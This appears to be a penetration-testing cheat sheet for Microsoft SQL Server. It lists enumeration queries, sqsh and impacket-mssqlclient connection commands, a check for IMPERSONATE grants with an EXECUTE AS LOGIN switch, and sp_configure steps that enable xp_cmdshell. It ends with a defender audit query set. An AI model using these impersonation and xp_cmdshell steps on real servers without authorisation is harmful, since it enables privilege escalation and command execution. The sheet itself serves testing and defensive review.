select * from sys.databases;
- select name from sys.databases;
- select name from master..sysdatabases;
use <DB>;
select * from sys.tables;
- select name from sys.tables;
select * from <table>;
SELECT COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = '<TABLE>';
---
# enumerate db
enum_db
# select db
use <db>
# Check impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
# LOGIN as impersonate
EXECUTE AS LOGIN = 'hrappdb-reader'
# Enum tables
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
sqsh
sqsh -S $IP -U $USER -P $PWD -h
sqsh -S $IP -U .\\$ACCOUNT_NAME -P $PWD -h
impacket-mssqlclient
impacket-mssqlclient -p $PORT $USER@$IP
impacket-mssqlclient -p $PORT $USER@$IP -windows-auth
impacket-mssqlclient $DOMAIN/$USER:$PWD@$IP
impacket-mssqlclient $DOMAIN/$USER:$PWD@$IP -windows-auth
When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, the client assumes SQL Authentication and authenticates against the logins created inside SQL Server. If we do specify the domain or hostname, it uses Windows Authentication. If we are targeting a local account, we can use SERVERNAME\\accountname or .\\accountname.
sqsh -S $IP -U .\\$accountname -P $PWD -h
If we use sqlcmd, we will need to use GO after our query to execute the SQL syntax.
SELECT name FROM master.dbo.sysdatabases;
GO
USE $DB
GO
xp_cmdshell is a powerful feature and is disabled by default. It can be enabled and disabled using Policy-Based Management or by executing sp_configure.
# if xp_cmdshell is not enabled
EXECUTE sp_configure 'show advanced options', 1
GO
# To update the currently configured value for advanced options
RECONFIGURE
GO
# To enable the feature
EXECUTE sp_configure 'xp_cmdshell', 1
GO
# To update the currently configured value for this feature
RECONFIGURE
GO
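A defender-side audit for the two things this sheet probes, IMPERSONATE grants and xp_cmdshell state, as an added example that is not part of the original cheat sheet. It assumes a login with sysadmin or VIEW SERVER STATE on the reviewed instance; the sys.* catalog views and DMVs are standard SQL Server objects.

```sql
-- Added audit example (not from the original cheat sheet).
-- Run on the instance being reviewed; needs VIEW SERVER STATE / sysadmin.

-- 1) Is xp_cmdshell (or the 'show advanced options' gate) currently on?
--    value_in_use = 1 means the feature is live right now.
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'ENABLED' ELSE 'disabled' END AS state
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2) Which logins may run EXECUTE AS LOGIN on which other logins?
--    For server-principal permissions, major_id is the login being impersonated
--    and grantee_principal_id is the login that received the right.
SELECT grantee.name AS grantee_login,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
ORDER BY grantee.name, target.name;

-- 3) Sessions currently running under an impersonated login:
--    original_login_name is who connected, login_name is who the session
--    executes as after EXECUTE AS LOGIN; a mismatch is worth a look.
SELECT session_id,
       original_login_name,
       login_name          AS executing_as,
       host_name,
       program_name,
       login_time
FROM sys.dm_exec_sessions
WHERE is_user_process = 1
  AND original_login_name <> login_name;
```

Schedule the first two queries as a baseline and alert on drift; the third is a point-in-time view, so pair it with SQL Audit or Extended Events if you need a durable record of impersonation.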